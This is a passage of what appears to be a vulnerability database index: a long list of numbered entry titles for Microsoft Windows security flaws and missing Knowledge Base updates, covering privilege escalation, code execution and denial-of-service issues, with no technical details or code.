update is not installed [80865] Microsoft Windows Knowledge Base Article 2769369 update is not installed [80864] Microsoft Windows print spooler code execution [80863] Microsoft Windows Knowledge Base Article 2778930 update is not installed [80862] Microsoft Windows broadcast privilege escalation [80861] Microsoft Windows Knowledge Base Article 2785220 update is not installed [80860] Microsoft Windows SSL/TLS security bypass [80365] Microsoft Windows Knowledge Base Article 2761465 update is not installed [80360] Microsoft Windows Knowledge Base Article 2765809 update is not installed [80359] Microsoft Windows IPHTTPS security bypass [80358] Microsoft Windows Knowledge Base Article 2770660 update is not installed [80357] Microsoft Windows DirectPlay buffer overflow [80356] Microsoft Windows Knowledge Base Article 2780642 update is not installed [80352] Microsoft Windows Knowledge Base Article 2783534 update is not installed [80351] Microsoft Windows TrueType Fonts files code execution [80350] Microsoft Windows OpenType Font code execution [80349] Microsoft Windows Knowledge Base Article 2784126 update is not installed [79693] Microsoft Windows Knowledge Base Article 2745030 update is not installed [79687] Microsoft Windows Knowledge Base Article 2761451 update is not installed [79683] Microsoft Windows Knowledge Base Article 2761226 update is not installed [79682] Microsoft Windows font code execution [79681] Microsoft Windows kernel privilege escalation [79680] Microsoft Windows kernel privilege escalation [79679] Microsoft Windows Knowledge Base Article 2758857 update is not installed [79678] Microsoft Windows filenames code execution [79677] Microsoft Windows Knowledge Base Article 2727528 update is not installed [79676] Microsoft Windows Briefcase integer overflow [79675] Microsoft Windows Briefcase integer underflow [79648] Microsoft Windows Help Viewer denial of service [79479] Microsoft Windows Media Player .avi denial of service [79124] Microsoft Windows IKE privilege escalation [78864] Microsoft Windows Knowledge Base Article 2754670 update is not installed [78862] Microsoft Windows Knowledge Base Article 2743555 update is not installed [78861] Microsoft Windows Kerberos denial of service [78858] Microsoft Windows Knowledge Base Article 2754849 update is not installed [78856] Microsoft Windows Knowledge Base Article 2724197 update is not installed [78855] Microsoft Windows kernel privilege escalation [78853] Microsoft Windows Knowledge Base Article 2741517 update is not installed [78851] Microsoft Windows Knowledge Base Article 2742319 update is not installed [78848] Microsoft Windows Knowledge Base Article 2742321 update is not installed [78760] Microsoft Windows Knowledge Base Article 2744842 update is not installed [78620] Microsoft Windows Phone 7 domain name spoofing [78077] Microsoft Windows Knowledge Base Article 2741528 update is not installed [78075] Microsoft Windows Knowledge Base Article 2720184 update is not installed [78071] Microsoft Windows Knowledge Base Article 2748552 update is not installed [77512] Microsoft Windows Knowledge Base Article 2740358 update is not installed [77362] Microsoft Windows Knowledge Base Article 2733918 update is not installed [77360] Microsoft Windows Knowledge Base Article 2733829 update is not installed [77357] Microsoft Windows Knowledge Base Article 2733594 update is not installed [77356] Microsoft Windows RAP response packet buffer overflow [77355] Microsoft Windows RAP response packet buffer overflow [77354] Microsoft Windows Print Spooler service format string [77353] Microsoft Windows Remote Administration Protocol denial of service [77352] Microsoft Windows Knowledge Base Article 2731879 update is not installed [77350] Microsoft Windows Knowledge Base Article 2731847 update is not installed [77349] Microsoft Windows memory privilege escalation [77348] Microsoft Windows Knowledge Base Article 2723135 update is not installed [77347] Microsoft Windows Remote Desktop Protocol code execution [77346] Microsoft Windows Knowledge Base Article 2722913 update is not installed [77342] Microsoft Windows Knowledge Base Article 2720573 update is not installed [77341] Microsoft Windows ActiveX control code execution [77325] Microsoft Windows Knowledge Base Article 2719584 update is not installed [77323] Microsoft Windows Knowledge Base Article 2706045 update is not installed [77322] Microsoft Windows VBScript and JScript and Microsoft Internet Explorer object integer overflow [77244] nginx and Microsoft Windows request security bypass [76808] Microsoft Windows Knowledge Base Article 2721015 update is not installed [76725] Microsoft Windows Knowledge Base Article 2722479 update is not installed [76724] Microsoft Windows Knowledge Base Article 2719177 update is not installed [76721] Microsoft Windows Knowledge Base Article 2718523 update is not installed [76720] Microsoft Windows hook procedure privilege escalation [76719] Microsoft Windows keyboard privilege escalation [76718] Microsoft Windows Knowledge Base Article 2698365 update is not installed [76711] Microsoft Windows Knowledge Base Article 2695502 update is not installed [76707] Microsoft Windows search scopes information disclosure [76704] Microsoft Windows Knowledge Base Article 2691442 update is not installed [76703] Microsoft Windows file code execution [76702] Microsoft Windows Knowledge Base Article 2655992 update is not installed [76701] Microsoft Windows TLS information disclosure [76223] Microsoft Windows .otf denial of service [76221] Microsoft Windows XML Core Services code execution [76026] Microsoft Windows Microsoft Certificate Authority spoofing [75963] Microsoft Windows Knowledge Base Article 2699988 update is not installed [75949] Microsoft Windows Knowledge Base Article 2707960 update is not installed [75942] Microsoft Windows Knowledge Base Article 2706726 update is not installed [75939] Microsoft Windows Knowledge Base Article 2685939 update is not installed [75938] Microsoft Windows RDP code execution [75934] Microsoft Windows Knowledge Base Article 2709162 update is not installed [75933] Microsoft Windows thread privilege escalation [75932] Microsoft Windows font privilege escalation [75931] "Microsoft Windows Clipboard Format Atom Name privilege escalation" [75930] Microsoft Windows String Atom Class Name privilege escalation [75929] Microsoft Windows String Atom Class Name privilege escalation [75928] Microsoft Windows Knowledge Base Article 2711167 update is not installed [75927] Microsoft Windows User Mode Scheduler privilege escalation [75926] Microsoft Windows Knowledge Base Article 2709100 update is not installed [75905] Microsoft Windows Knowledge Base Article 2707956 update is not installed [75772] Microsoft Windows keyboard layout privilege escalation [75329] Microsoft Windows xxxCreateWindowEx() denial of service [75140] Microsoft Windows scrollbar calculation privilege escalation [75139] Microsoft Windows Keyboard Layout files privilege escalation [75138] Microsoft Windows messages privilege escalation [75136] Microsoft Windows Knowledge Base Article 2693777 update is not installed [75132] Microsoft Windows Knowledge Base Article 2690533 update is not installed [75131] Microsoft Windows Plug and Play (PnP) privilege escalation [75130] Microsoft Windows Knowledge Base Article 2688338 update is not installed [75129] Microsoft Windows IPv6 address privilege escalation [75128] Microsoft Windows broadcast packets security bypass [75127] Microsoft Windows Knowledge Base Article 2681578 update is not installed [75126] Microsoft Windows GDI+ EMF buffer overflow [75125] Microsoft Windows GDI+ EMF code execution [75124] Microsoft Windows TrueType code execution [75123] Microsoft Windows Knowledge Base Article 2680352 update is not installed [75116] Microsoft Windows Knowledge Base Article 2597981 update is not installed [74556] Microsoft Windows Knowledge Base Article 2639185 update is not installed [74384] Microsoft Windows Knowledge Base Article 2675157 update is not installed [74378] Microsoft Windows Knowledge Base Article 2671605 update is not installed [74373] Microsoft Windows Knowledge Base Article 2664258 update is not installed [74372] Microsoft Windows MSCOMCTL.OCX ActiveX control code execution [74369] Microsoft Windows Knowledge Base Article 2663860 update is not installed [73543] Microsoft Windows Knowledge Base Article 2671387 update is not installed [73542] Microsoft Windows Remote Desktop Protocol denial of service [73541] Microsoft Windows Remote Desktop Protocol code execution [73540] Microsoft Windows Knowledge Base Article 2665364 update is not installed [73538] Microsoft Windows Knowledge Base Article 2651019 update is not installed [73536] Microsoft Windows Knowledge Base Article 2651018 update is not installed [73533] Microsoft Windows Knowledge Base Article 2647170 update is not installed [73532] Microsoft Windows DNS Server denial of service [73530] Microsoft Windows Knowledge Base Article 2641653 update is not installed [73529] Microsoft Windows PostMessage function privilege escalation [73356] Microsoft Windows DNS security bypass [72950] Microsoft Windows IPv6 information disclosure [72887] Microsoft Windows Knowledge Base Article 2663841 update is not installed [72873] Microsoft Windows Knowledge Base Article 2663830 update is not installed [72867] Microsoft Windows Knowledge Base Article 2663510 update is not installed [72857] Microsoft Windows Knowledge Base Article 2661637 update is not installed [72855] Microsoft Windows Knowledge Base Article 2660465 update is not installed [72854] Microsoft Windows keyboard privilege escalation [72853] Microsoft Windows Knowledge Base Article 2653956 update is not installed [72852] Microsoft Windows Authenticode code execution [72851] Microsoft Windows Knowledge Base Article 2654428 update is not installed [72850] Microsoft Windows msvcrt dynamic link library buffer overflow [72849] Microsoft Windows Knowledge Base Article 2651026 update is not installed [72846] Microsoft Windows Knowledge Base Article 2647516 update is not installed [72841] Microsoft Windows Knowledge Base Article 2645640 update is not installed [72840] Microsoft Windows Ancillary Function Driver privilege escalation [72839] Microsoft Windows Ancillary Function Driver privilege escalation [72838] Microsoft Windows Knowledge Base Article 2643719 update is not installed [72560] Microsoft Windows Media Format ASF invalid stream [72346] Microsoft Windows Explorer denial of service [72029] Microsoft Windows Knowledge Base Article 2638420 update is not installed [72003] Microsoft Windows Knowledge Base Article 2646524 update is not installed [72002] Microsoft Windows Client/Server Run-time Subsystem Unicode privilege escalation [71998] Microsoft Windows Knowledge Base Article 2644615 update is not installed [71997] Microsoft Windows SafeSEH security bypass [71995] Microsoft Windows Knowledge Base Article 2643584 update is not installed [71994] Microsoft Windows Knowledge Base Article 2636391 update is not installed [71993] Microsoft Windows DirectShow code execution [71992] Microsoft Windows Media Player MIDI code execution [71991] Microsoft Windows Knowledge Base Article 2607664 update is not installed [71966] Microsoft Windows Media Player access denial of service [71944] Microsoft Windows Phone messages denial of service [71873] Microsoft Windows win32k.sys code execution [71733] Microsoft Windows sandbox privilege escalation [71565] Microsoft Windows Knowledge Base Article 2648048 update is not installed [71564] Microsoft Windows Media Player DVR-MS code execution [71562] Microsoft Windows Knowledge Base Article 2640241 update is not installed [71560] Microsoft Windows Knowledge Base Article 2640045 update is not installed [71559] Microsoft Windows Active Directory buffer overflow [71558] Microsoft Windows Knowledge Base Article 2639417 update is not installed [71557] Microsoft Windows Knowledge Base Article 2639142 update is not installed [71554] Microsoft Windows Knowledge Base Article 2633171 update is not installed [71553] Microsoft Windows kernel privilege escalation [71552] Microsoft Windows Knowledge Base Article 2624667 update is not installed [71551] Microsoft Windows OLE object code execution [71550] Microsoft Windows Knowledge Base Article 2620712 update is not installed [71549] Microsoft Windows Client/Server Run-time Subsystem Csrsrv.dll privilege escalation [71548] Microsoft Windows Knowledge Base Article 2618451 update is not installed [71546] Microsoft Windows Knowledge Base Article 2618444 update is not installed [71542] Microsoft Windows Knowledge Base Article 2607702 update is not installed [71538] Microsoft Windows Knowledge Base Article 2590602 update is not installed [71418] Microsoft Windows keyboard layout denial of service [71291] Microsoft Windows Server AppLocker security bypass [71073] Microsoft Windows kernel Duqu code execution [70951] Microsoft Windows Knowledge Base Article 2630837 update is not installed [70950] Microsoft Windows Active Directory privilege escalation [70949] Microsoft Windows Knowledge Base Article 2620704 update is not installed [70948] Microsoft Windows Mail and Windows Meeting Space code execution [70947] Microsoft Windows Knowledge Base Article 2617657 update is not installed [70946] Microsoft Windows TrueType denial of service [70945] Microsoft Windows Knowledge Base Article 2603381 update is not installed [70944] Microsoft Windows Object Packager code execution [70943] Microsoft Windows Knowledge Base Article 2588516 update is not installed [70942] Microsoft Windows TCP/IP code execution [70940] Microsoft Windows ClickOnce code execution [70152] Microsoft Windows Knowledge Base Article 2623699 update is not installed [70150] Microsoft Windows Knowledge Base Article 2607670 update is not installed [70143] Microsoft Windows Media Center DLL code execution [70140] Microsoft Windows Knowledge Base Article 2652016 update is not installed [70137] Microsoft Windows Ancillary Function Driver privilege escalation [70130] Microsoft Windows Knowledge Base Article 2586448 update is not installed [70115] Microsoft Windows Knowledge Base Article 2567053 update is not installed [70114] Microsoft Windows use-after-free privilege escalation [70113] Microsoft Windows .fon buffer overflow [70112] Microsoft Windows TrueType denial of service [69638] Microsoft Windows csrss.exe denial of service [69558] Microsoft Windows Script Host DLL code execution [69501] Microsoft Windows Knowledge Base Article 2587634 update is not installed [69498] Microsoft Windows Knowledge Base Article 2587505 update is not installed [69492] Microsoft Windows Knowledge Base Article 2571621 update is not installed [69491] Microsoft Windows WINS privilege escalation [69490] Microsoft Windows Knowledge Base Article 2570947 update is not installed [69489] Microsoft Windows components DLL code execution [69215] Microsoft Windows DHCPv6 denial of service [69009] Microsoft Windows Client/Server Run-time Subsystem information disclosure [68840] Microsoft Windows Knowledge Base Article 2451858 update is not installed [68838] Microsoft SharePoint and Windows SharePoint Services cross-site scripting [68837] Microsoft SharePoint and Windows SharePoint Services XML file disclosure [68836] Microsoft SharePoint and Windows SharePoint Services contact details cross-site scripting [68833] Microsoft Windows Knowledge Base Article 2567943 update is not installed [68831] Microsoft Windows Knowledge Base Article 2570222 update is not installed [68830] Microsoft Windows Remote Desktop Protocol denial of service [68829] Microsoft Windows Knowledge Base Article 2567951 update is not installed [68827] Microsoft Windows Knowledge Base Article 2578230 update is not installed [68825] Microsoft Windows Knowledge Base Article 2546250 update is not installed [68824] Microsoft Windows Remote Desktop Web Access privilege escalation [68823] Microsoft Windows Knowledge Base Article 2559049 update is not installed [68816] Microsoft Windows Knowledge Base Article 2556532 update is not installed [68815] Microsoft Windows kernel meta-data denial of service [68814] Microsoft Windows Knowledge Base Article 2560656 update is not installed [68813] Microsoft Windows Data Access code execution [68812] Microsoft Windows Knowledge Base Article 2560978 update is not installed [68809] Microsoft Windows Knowledge Base Article 2562485 update is not installed [68808] Microsoft Windows DNS Server denial of service [68807] Microsoft Windows DNS Server code execution [68806] Microsoft Windows Knowledge Base Article 2566454 update is not installed [68805] Microsoft Windows NDISTAPI privilege escalation [68804] Microsoft Windows Knowledge Base Article 2563894 update is not installed [68803] Microsoft Windows TCP/IP QoS denial of service [68802] Microsoft Windows TCP/IP ICMP denial of service [68801] Microsoft Windows Knowledge Base Article 2567680 update is not installed [68800] Microsoft Windows Client/Server Run-time Subsystem Winsrv.dl privilege escalation [68469] Microsoft Windows GPU denial of service [68467] Microsoft Windows NVIDIA Geforce 310 denial of service [68465] Microsoft Windows Intel G41 denial of service [68315] Microsoft Windows Knowledge Base Article 2555917 update is not installed [68314] Microsoft Windows win32k.sys privilege escalation [68313] Microsoft Windows win32k.sys privilege escalation [68312] Microsoft Windows win32k.sys information disclosure [68311] Microsoft Windows NULL privilege escalation [68310] Microsoft Windows win32k.sys privilege escalation [68309] Microsoft Windows win32k.sys privilege escalation [68308] Microsoft Windows win32k.sys privilege escalation [68307] Microsoft Windows NULL pointer privilege escalation [68306] Microsoft Windows NULL pointer privilege escalation [68305] Microsoft Windows kernel-mode driver privilege escalation [68304] Microsoft Windows kernel-mode driver privilege escalation [68303] Microsoft Windows kernel-mode driver privilege escalation [68302] Microsoft Windows win32k.sys privilege escalation [68301] Microsoft Windows win32k.sys privilege escalation [68300] Microsoft Windows win32k.sys privilege escalation [68299] Microsoft Windows Knowledge Base Article 2566220 update is not installed [68298] Microsoft Windows Bluetooth stack code execution [68283] Microsoft Windows Knowledge Base Article 2560847 update is not installed [68002] Microsoft Windows Media Player klite denial of service [67989] Microsoft Windows tskill privilege escalation [67955] Microsoft Windows Knowledge Base Article 2530548 update is not installed [67943] Microsoft Windows Knowledge Base Article 2544521 update is not installed [67942] Microsoft Windows Vector Markup Language (VML) code execution [67795] Microsoft Windows Live Messenger dwmapi.dll code execution [67762] Microsoft Windows Knowledge Base Article 2543893 update is not installed [67759] Microsoft Windows Knowledge Base Article 2544893 update is not installed [67758] Microsoft Windows MHTML information disclosure [67757] Microsoft Windows Knowledge Base Article 2476490 update is not installed [67756] Microsoft Windows Object Linking and Embedding WMF code execution [67755] Microsoft Windows Knowledge Base Article 2503665 update is not installed [67754] Microsoft Windows Ancillary Function Driver privilege escalation [67753] Microsoft Windows Knowledge Base Article 2514842 update is not installed [67751] Microsoft Windows Knowledge Base Article 2518295 update is not installed [67750] Microsoft Windows Active Directory Certificate Services Web Enrollment cross-site scripting [67749] Microsoft Windows Knowledge Base Article 2507938 update is not installed [67748] Microsoft Windows SrvWriteConsoleOutputString privilege escalation [67747] Microsoft Windows SrvWriteConsoleOutput privilege escalation [67746] Microsoft Windows CSRSS SrvSetConsoleNumberOfCommand privilege escalation [67745] Microsoft Windows CSRSS SrvSetConsoleLocalEUDC privilege escalation [67744] Microsoft Windows CSRSS AllocConsole privilege escalation [67737] Microsoft Windows Knowledge Base Article 2520426 update is not installed [67733] Microsoft Windows Knowledge Base Article 2525694 update is not installed [67732] Microsoft Windows Win32k OTF code execution [67731] Microsoft Windows Knowledge Base Article 2525835 update is not installed [67730] Microsoft Windows Server Hyper-V VMBus denial of service [67728] Microsoft Windows Knowledge Base Article 2535512 update is not installed [67727] Microsoft Windows DFS denial of service [67726] Microsoft Windows DFS code execution [67725] Microsoft Windows Knowledge Base Article 2536275 update is not installed [67724] Microsoft Windows SMB request denial of service [67722] Microsoft Windows Knowledge Base Article 2536276 update is not installed [67721] Microsoft Windows SMB responses code execution [67718] Microsoft Windows Knowledge Base Article 2537146 update is not installed [67709] Microsoft Windows Knowledge Base Article 2538814 update is not installed [67520] Microsoft Windows Vista nsiproxy.sys denial of service [67302] Microsoft Windows Knowledge Base Article 2545814 update is not installed [67101] Microsoft Windows Knowledge Base Article 2524426 update is not installed [67100] Microsoft Windows Windows Internet Name Service code execution [66856] Microsoft Windows Media Player .avi buffer overflow [66855] Microsoft Windows Media Player .ogg denial of service [66845] Microsoft Windows Knowledge Base Article 2506014 update is not installed [66844] Microsoft Windows Knowledge Base Article 2501584 update is not installed [66835] Microsoft Windows and Internet Explorer msxml.dll information disclosure [66639] Microsoft Windows XP afd.sys denial of service [66469] Microsoft Windows Explorer Shmedia.dll denial of service [66448] Microsoft Windows Knowledge Base Article 2508272 update is not installed [66447] Microsoft Windows Messenger ActiveX control code execution [66446] Microsoft Windows Knowledge Base Article 2514666 update is not installed [66445] Microsoft Windows VBScript and Jscript code execution [66444] Microsoft Windows Knowledge Base Article 2511455 update is not installed [66443] Microsoft Windows SMB response code execution [66442] Microsoft Windows Knowledge Base Article 2509553 update is not installed [66441] Microsoft Windows DNS resolution code execution [66440] Microsoft Windows Knowledge Base Article 2508429 update is not installed [66439] Microsoft Windows SMB protocol code execution [66438] Microsoft Windows Knowledge Base Article 2507618 update is not installed [66437] Microsoft Windows OpenType buffer overflow [66436] Microsoft Windows Knowledge Base Article 2497640 update is not installed [66432] Microsoft Windows Knowledge Base Article 2527308 update is not installed [66431] Microsoft Windows Fax Cover Page Editor code execution [66430] Microsoft Windows Knowledge Base Article 2503658 update is not installed [66428] Microsoft Windows Knowledge Base Article 2489979 update is not installed [66427] Microsoft Windows GDI+ EMF code execution [66425] Microsoft Windows Knowledge Base Article 2506223 update is not installed [66424] Microsoft Windows kernel-mode driver (win32k.sys) variant 30 privilege escalation [66423] Microsoft Windows kernel-mode driver (win32k.sys) variant 29 privilege escalation [66422] Microsoft Windows kernel-mode driver (win32k.sys) variant 28 privilege escalation [66421] Microsoft Windows kernel-mode driver (win32k.sys) variant 27 privilege escalation [66420] Microsoft Windows kernel-mode driver (win32k.sys) variant 26 privilege escalation [66419] Microsoft Windows kernel-mode driver (win32k.sys) variant 25 privilege escalation [66418] Microsoft Windows kernel-mode driver (win32k.sys) variant 24 privilege escalation [66417] Microsoft Windows kernel-mode driver (win32k.sys) variant 23 privilege escalation [66416] Microsoft Windows kernel-mode driver (win32k.sys) variant 22 privilege escalation [66415] Microsoft Windows kernel-mode driver (win32k.sys) variant 21 privilege escalation [66414] Microsoft Windows kernel-mode driver (win32k.sys) variant 20 privilege escalation [66413] Microsoft Windows kernel-mode driver (win32k.sys) variant 19 privilege escalation [66412] Microsoft Windows kernel-mode driver (win32k.sys) variant 18 privilege escalation [66411] Microsoft Windows kernel-mode driver (win32k.sys) variant 17 privilege escalation [66410] Microsoft Windows kernel-mode driver (win32k.sys) variant 16 privilege escalation [66409] Microsoft Windows kernel-mode driver (win32k.sys) variant 15 privilege escalation [66408] Microsoft Windows kernel-mode driver (win32k.sys) variant 14 privilege escalation [66407] Microsoft Windows kernel-mode driver (win32k.sys) variant 13 privilege escalation [66406] Microsoft Windows kernel-mode driver (win32k.sys) variant 12 privilege escalation [66405] Microsoft Windows kernel-mode driver (win32k.sys) variant 11 privilege escalation [66404] Microsoft Windows kernel-mode driver (win32k.sys) variant 10 privilege escalation [66403] Microsoft Windows kernel-mode driver (win32k.sys) variant 9 privilege escalation [66402] Microsoft Windows kernel-mode driver (win32k.sys) variant 8 privilege escalation [66401] Microsoft Windows kernel-mode driver (win32k.sys) variant 7 privilege escalation [66400] Microsoft Windows kernel-mode driver (win32k.sys) variant 6 privilege escalation [66399] Microsoft Windows kernel-mode driver (win32k.sys) variant 5 privilege escalation [66398] Microsoft Windows kernel-mode driver (win32k.sys) variant 4 privilege escalation [66397] Microsoft Windows kernel-mode driver (win32k.sys) variant 3 privilege escalation [66396] Microsoft Windows kernel-mode driver (win32k.sys) variant 2 privilege escalation [66395] Microsoft Windows kernel-mode driver (win32k.sys) variant 1 privilege escalation [66394] Microsoft Windows Knowledge Base Article 2485663 update is not installed [66312] Microsoft Windows Media Player .ape buffer overflow [66254] Microsoft Windows certificates spoofing [65972] Microsoft Windows mscorsvw.exe privilege escalation [65588] Microsoft Windows Knowledge Base Article 2489279 update is not installed [65581] Microsoft Windows Knowledge Base Article 2510030 update is not installed [65580] Microsoft Windows Knowledge Base Article 2489283 update is not installed [65575] Microsoft Windows Knowledge Base Article 2489293 update is not installed [65573] Microsoft Windows Knowledge Base Article 2494047 update is not installed [65570] Microsoft Windows Knowledge Base Article 2500212 update is not installed [65568] Microsoft Windows Knowledge Base Article 2508062 update is not installed [65567] Microsoft Windows RDC code execution [65495] Microsoft Windows HID weak security [65383] Microsoft Windows Graphics Rendering Engine height integer overflow [65382] Microsoft Windows Graphics Rendering Engine BMP integer overflow [65381] Microsoft Windows Graphics Rendering Engine biCompression buffer overflow [65376] Microsoft Windows Server CIFS code execution [65169] Microsoft Windows Azure information disclosure [65000] Microsoft Windows MHTML information disclosure [64973] Microsoft Windows Knowledge Base Article 2478960 update is not installed [64972] Microsoft Windows LSASS privilege escalation [64971] Microsoft Windows Knowledge Base Article 2479628 update is not installed [64970] Microsoft Windows Win32k.sys privilege escalation [64969] Microsoft Windows classpointer privilege escalation [64968] Microsoft Windows pointer privilege escalation [64967] Microsoft Windows Win32k.sys privilege escalation [64966] Microsoft Windows Win32k.sys privilege escalation [64927] Microsoft Windows Knowledge Base Article 2393802 update is not installed [64926] Microsoft Windows kernel privilege escalation [64925] Microsoft Windows Knowledge Base Article 2451879 update is not installed [64921] Microsoft Windows Media Player and Windows Media Center DVR-MS code execution [64920] Microsoft Windows Knowledge Base Article 2475792 update is not installed [64919] Microsoft Windows VBScript and JScript information disclosure [64918] Microsoft Windows Knowledge Base Article 2476687 update is not installed [64917] Microsoft Windows CSRSS privilege escalation [64916] Microsoft Windows Knowledge Base Article 2478953 update is not installed [64915] Microsoft Windows Active Directory denial of service [64914] Microsoft Windows Knowledge Base Article 2482017 update is not installed [64910] Microsoft Windows Knowledge Base Article 2483185 update is not installed [64909] Microsoft Windows Knowledge Base Article 2484015 update is not installed [64907] Microsoft Windows Knowledge Base Article 2485376 update is not installed [64906] Microsoft Windows OpenType Compact Font Format code execution [64905] Microsoft Windows Knowledge Base Article 2489256 update is not installed [64902] Microsoft Windows Knowledge Base Article 2496930 update is not installed [64901] Microsoft Windows Kerberos spoofing [64900] Microsoft Windows Kerberos checksum privilege escalation [64837] Microsoft Windows Fax Cover Page Editor code execution [64583] Microsoft Windows Neighbor Discovery (ND) protocol denial of service [64474] Microsoft Windows Remote Access Phonebook code execution [64446] Microsoft Windows Contacts DLL code execution [64382] Microsoft Windows Graphics Rendering Engine buffer overflow [64342] Microsoft Windows Knowledge Base Article 2451910 update is not installed [64339] Microsoft Windows Knowledge Base Article 2478935 update is not installed [64307] Microsoft Windows Windows Fax Cover Page Editor component buffer overflow [63909] Microsoft Windows dynamic-linked library (oci.dll) code execution [63816] Microsoft Windows Media Encoder 9 dynamic-linked library (DLL) code execution [63807] Microsoft Windows Mail dynamic-linked library (wab32res.dll) code execution [63803] Microsoft Windows Live Messenger dynamic-linked library (msgsres.dll) code execution [63788] Microsoft Windows Backup dynamic-linked library (fveapi.dll) code execution [63787] Microsoft Windows Internet Communication Settings dynamic-linked library (schannel.dll) code execution [63779] Microsoft Windows Indeo Filter dynamic-linked library (iacenc.dll) code execution [63776] Microsoft Windows Program Group Converter dynamic-linked library (DLL) code execution [63773] Microsoft Windows Address Book dynamic-linked library (wab32res.dll) code execution [63586] Microsoft Windows Knowledge Base Article 2207559 update is not installed [63585] Microsoft Windows Netlogon denial of service [63584] Microsoft Windows Knowledge Base Article 2424434 update is not installed [63583] Microsoft Windows Movie Maker insecure library loading code execution [63582] Microsoft Windows Knowledge Base Article 2423089 update is not installed [63580] Microsoft Windows Knowledge Base Article 2436673 update is not installed [63579] Microsoft Windows user mode privilege escalation [63578] Microsoft Windows cursor privilege escalation [63577] Microsoft Windows WriteAV privilege escalation [63576] Microsoft Windows pointer privilege escalation [63575] Microsoft Windows double free privilege escalation [63574] Microsoft Windows kernel-mode drivers buffer overflow [63573] Microsoft Windows Knowledge Base Article 2407132 update is not installed [63572] Microsoft Exchange Server RPC denial of service [63571] Microsoft Windows Knowledge Base Article 2440591 update is not installed [63570] Microsoft Windows NDProxy buffer overflow [63569] Microsoft Windows Knowledge Base Article 2385678 update is not installed [63568] Microsoft Windows BranchCache code execution [63566] Microsoft Windows Knowledge Base Article 2442962 update is not installed [63565] Microsoft Windows Consent User Interface privilege escalation [63564] Microsoft Windows Knowledge Base Article 2345316 update is not installed [63563] Microsoft Windows Server Hyper-V VMBus denial of service [63562] Microsoft Windows Knowledge Base Article 2296199 update is not installed [63561] Microsoft Windows OpenType Font (OTF) CMAP code execution [63560] Microsoft Windows OpenType Font (OTF) format driver code execution [63559] Microsoft Windows OpenType Font (OTF) format driver code execution [63558] Microsoft Windows Knowledge Base Article 2416400 update is not installed [63550] Microsoft Windows Knowledge Base Article 2447961 update is not installed [63549] Microsoft Windows Media Encoder code execution [63548] Microsoft Windows Knowledge Base Article 2443105 update is not installed [63547] Microsoft Windows Internet Signup code execution [63546] Microsoft Windows Knowledge Base Article 2455005 update is not installed [63544] Microsoft Windows Knowledge Base Article 2292970 update is not installed [63538] Microsoft Windows Knowledge Base Article 968095 update is not installed [63450] Microsoft Windows REG_BINARY privilege escalation [62805] Microsoft Windows Knowledge Base Article 2316074 update is not installed [62797] Microsoft Windows Knowledge Base Article 2305420 update is not installed [62796] Microsoft Windows Task Scheduler privilege escalation [62793] Microsoft Windows Knowledge Base Article 2293386 update is not installed [62789] Microsoft Windows Knowledge Base Article 2423930 update is not installed [62737] Microsoft WindowsTask Scheduler service privilege escalation [62716] Microsoft Windows Mobile .vcf denial of service [62643] Microsoft Windows unspecified privilege escalation [62642] Microsoft Windows unspecified privilege escalation [62170] Microsoft Windows Knowledge Base Article 2296011 update is not installed [62169] Microsoft Windows Explorer buffer overflow [62166] Microsoft Windows Knowledge Base Article 2294255 update is not installed [62165] Microsoft Windows Failover Cluster Manager insecure permissions [62163] Microsoft Windows Knowledge Base Article 2281679 update is not installed [62162] Microsoft Windows Media Player RTSP code execution [62154] Microsoft Windows Knowledge Base Article 2279986 update is not installed [62153] Microsoft Windows OpenType Font fonts privilege escalation [62152] Microsoft Windows OpenType Font privilege escalation [62149] Microsoft Windows Knowledge Base Article 2207566 update is not installed [62148] Microsoft Windows SChannel denial of service [62147] Microsoft Windows Knowledge Base Article 2160841 update is not installed [62143] Microsoft Windows Knowledge Base Article 982132 update is not installed [62142] Microsoft Windows OpenType table code execution [62138] Microsoft Windows Knowledge Base Article 981957 update is not installed [62137] Microsoft Windows class privilege escalation [62135] Microsoft Windows keyboard privilege escalation [62134] Microsoft Windows Knowledge Base Article 2412048 update is not installed [62133] Microsoft Windows Knowledge Base Article 2405882 update is not installed [62129] Microsoft Windows Knowledge Base Article 2387149 update is not installed [62126] Microsoft Windows Knowledge Base Article 2378111 update is not installed [62125] Microsoft Windows Media Player code execution [62123] Microsoft Windows Knowledge Base Article 2360937 update is not installed [62118] Microsoft Windows Knowledge Base Article 2293211 update is not installed [62104] Microsoft Windows Knowledge Base Article 2360131 update is not installed [62103] Microsoft Windows LPC message privilege escalation [62098] Microsoft Windows Knowledge Base Article 2293194 update is not installed [62069] Microsoft Windows Knowledge Base Article 2418042 update is not installed [62006] Microsoft Windows unspecified privilege escalation [61994] Microsoft Windows MPEG Layer-3 Audio Decoder denial of service [61519] Microsoft Windows Knowledge Base Article 2121546 update is not installed [61518] Microsoft Windows CSRSS privilege escalation [61517] Microsoft Windows Knowledge Base Article 2259922 update is not installed [61514] Microsoft Windows Knowledge Base Article 2267960 update is not installed [61510] Microsoft Windows Knowledge Base Article 2315011 update is not installed [61507] Microsoft Windows Knowledge Base Article 2320113 update is not installed [61506] Microsoft Windows Unicode Scripts Processor code execution [61504] Microsoft Windows Knowledge Base Article 2347290 update is not installed [61503] Microsoft Windows Print Spooler service code execution [61501] Microsoft Windows Knowledge Base Article 975558 update is not installed [61500] Microsoft Windows MPEG-4 code execution [61499] Microsoft Windows Knowledge Base Article 982802 update is not installed [61258] Microsoft Windows IcmpSendEcho2Ex denial of service [61187] Microsoft Windows xxxRealDrawMenuItem() privilege escalation [61184] Microsoft Windows win32k!GreStretchBltInternal() denial of service [61129] Microsoft Windows Kerberos security bypass [60975] Microsoft Windows CreateDIBPalette() buffer overflow [60736] Microsoft Windows Knowledge Base Article 2265906 update is not installed [60734] Microsoft Windows Knowledge Base Article 2269638 update is not installed [60728] Microsoft Windows Knowledge Base Article 2269707 update is not installed [60724] Microsoft Windows Knowledge Base Article 2286198 update is not installed [60723] Microsoft Windows Knowledge Base Article 978886 update is not installed [60722] Microsoft Windows TCP/IP input buffer privilege escalation [60721] Microsoft WindowsTCP/IP IPv6 denial of service [60719] Microsoft Windows Knowledge Base Article 980436 update is not installed [60718] Microsoft Windows SChannel code execution [60713] Microsoft Windows Knowledge Base Article 2183461 update is not installed [60705] Microsoft Windows Knowledge Base Article 981852 update is not installed [60704] Microsoft Windows kernel ACL denial of service [60703] Microsoft Windows kernel errors privilege escalation [60702] Microsoft Windows kernel threads privilege escalation [60701] Microsoft Windows Knowledge Base Article 981997 update is not installed [60700] Microsoft Windows Movie Maker code execution [60698] Microsoft Windows Knowledge Base Article 2160329 update is not installed [60697] Microsoft Windows kernel-mode drivers window privilege escalation 